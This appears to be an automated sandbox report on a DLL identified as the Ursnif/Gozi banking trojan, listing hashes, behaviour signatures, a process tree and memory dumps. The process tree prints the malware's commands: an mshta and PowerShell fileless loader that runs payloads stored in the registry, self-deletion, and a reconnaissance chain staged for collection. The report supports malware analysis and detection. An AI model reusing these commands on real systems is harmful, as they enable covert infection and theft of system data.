Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    90s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    25/11/2020, 17:52

General

  • Target

    c9d954b3f1c512e6804fd8f5637b58b6.dll

  • Size

    234KB

  • MD5

    c9d954b3f1c512e6804fd8f5637b58b6

  • SHA1

    b452040d8072117ddbe1adf9e1eab5e4bdb150bd

  • SHA256

    d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3

  • SHA512

    a4e949017016c1cfaa9bdff664c8ee20b2a34fe78788de9a4338ae5ad9a8a2623ccafe6d4584ef4f6cb29bc05dbcb3a71cbcd4051560287fbe74fb5a5738c09b

Malware Config

Extracted

Family

ursnif

Attributes
  • dga_base_url

  • dga_crc

    0

  • dga_season

    0

  • dga_tlds

  • dns_servers

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Program crash 1 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 61 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 135 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 304
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:948
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CB4B3BAF-AEAE-3526-102F-C23944D3167D\\\Auxisext'));if(!window.flag)close()</script>"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CB4B3BAF-AEAE-3526-102F-C23944D3167D").aepiesrv))
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1600
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c11woszc\c11woszc.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:844
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7B.tmp" "c:\Users\Admin\AppData\Local\Temp\c11woszc\CSC7ABF99EE0CA476084BA81AE85CF39D.TMP"
            5⤵
              PID:1608
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pfrjuzmu\pfrjuzmu.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:672
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10F2.tmp" "c:\Users\Admin\AppData\Local\Temp\pfrjuzmu\CSC1E47F659D06E4512A6CBD8D0E63B1FED.TMP"
              5⤵
                PID:924
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll"
          2⤵
          • Deletes itself
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:772
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:816
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\D668.bi1"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1728
          • C:\Windows\system32\nslookup.exe
            nslookup myip.opendns.com resolver1.opendns.com
            3⤵
              PID:1032
          • C:\Windows\system32\cmd.exe
            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D668.bi1"
            2⤵
              PID:820
            • C:\Windows\system32\cmd.exe
              cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
              2⤵
                PID:600
                • C:\Windows\system32\systeminfo.exe
                  systeminfo.exe
                  3⤵
                  • Gathers system information
                  PID:1316
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:848
                • C:\Windows\system32\makecab.exe
                  makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\B40E.bin"
                  2⤵
                    PID:1544
                  • C:\Windows\system32\makecab.exe
                    makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\387E.bin"
                    2⤵
                      PID:532
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                      2⤵
                        PID:848
                      • C:\Windows\system32\cmd.exe
                        cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                        2⤵
                          PID:676
                          • C:\Windows\system32\net.exe
                            net view
                            3⤵
                            • Discovers systems in the same network
                            PID:1904
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                          2⤵
                            PID:1704
                          • C:\Windows\system32\cmd.exe
                            cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                            2⤵
                              PID:1332
                              • C:\Windows\system32\nslookup.exe
                                nslookup 127.0.0.1
                                3⤵
                                  PID:280
                              • C:\Windows\system32\cmd.exe
                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                2⤵
                                  PID:848
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                  2⤵
                                    PID:2020
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist.exe /SVC
                                      3⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1544
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                    2⤵
                                      PID:1200
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                      2⤵
                                        PID:676
                                        • C:\Windows\system32\driverquery.exe
                                          driverquery.exe
                                          3⤵
                                            PID:1316
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                          2⤵
                                            PID:280
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                            2⤵
                                              PID:1976
                                              • C:\Windows\system32\reg.exe
                                                reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                                3⤵
                                                  PID:960
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                                2⤵
                                                  PID:532
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\DB94.bin1 > C:\Users\Admin\AppData\Local\Temp\DB94.bin & del C:\Users\Admin\AppData\Local\Temp\DB94.bin1"
                                                  2⤵
                                                    PID:908
                                                  • C:\Windows\system32\makecab.exe
                                                    makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\568E.bin"
                                                    2⤵
                                                      PID:1648
                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                    1⤵
                                                    • Modifies Internet Explorer settings
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SetWindowsHookEx
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1820
                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1820 CREDAT:275457 /prefetch:2
                                                      2⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:976
                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                    1⤵
                                                    • Modifies Internet Explorer settings
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SetWindowsHookEx
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1532
                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1532 CREDAT:275457 /prefetch:2
                                                      2⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1344
                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1532 CREDAT:537611 /prefetch:2
                                                      2⤵
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1208

                                                  Network

                                                  MITRE ATT&CK Enterprise v6

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • memory/772-39-0x0000000002500000-0x000000000259B000-memory.dmp

                                                    Filesize

                                                    620KB

                                                  • memory/948-53-0x00000000026F0000-0x0000000002701000-memory.dmp

                                                    Filesize

                                                    68KB

                                                  • memory/948-43-0x0000000001E20000-0x0000000001E31000-memory.dmp

                                                    Filesize

                                                    68KB

                                                  • memory/976-3-0x0000000008790000-0x00000000087B3000-memory.dmp

                                                    Filesize

                                                    140KB

                                                  • memory/976-4-0x0000000005FA0000-0x0000000005FAA000-memory.dmp

                                                    Filesize

                                                    40KB

                                                  • memory/1252-36-0x0000000004240000-0x00000000042DB000-memory.dmp

                                                    Filesize

                                                    620KB

                                                  • memory/1252-60-0x0000000006CE0000-0x0000000006D71000-memory.dmp

                                                    Filesize

                                                    580KB

                                                  • memory/1600-33-0x0000000002600000-0x0000000002601000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-16-0x000000001AA10000-0x000000001AA11000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-17-0x000000001B4A0000-0x000000001B4A1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-15-0x00000000024C0000-0x00000000024C1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-14-0x00000000025D0000-0x00000000025D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-34-0x000000001C3E0000-0x000000001C47B000-memory.dmp

                                                    Filesize

                                                    620KB

                                                  • memory/1600-13-0x000000001AB30000-0x000000001AB31000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-12-0x0000000002480000-0x0000000002481000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-25-0x0000000002280000-0x0000000002281000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1600-11-0x000007FEF3A50000-0x000007FEF443C000-memory.dmp

                                                    Filesize

                                                    9.9MB

                                                  • memory/2000-1-0x000007FEF6AB0000-0x000007FEF6D2A000-memory.dmp

                                                    Filesize

                                                    2.5MB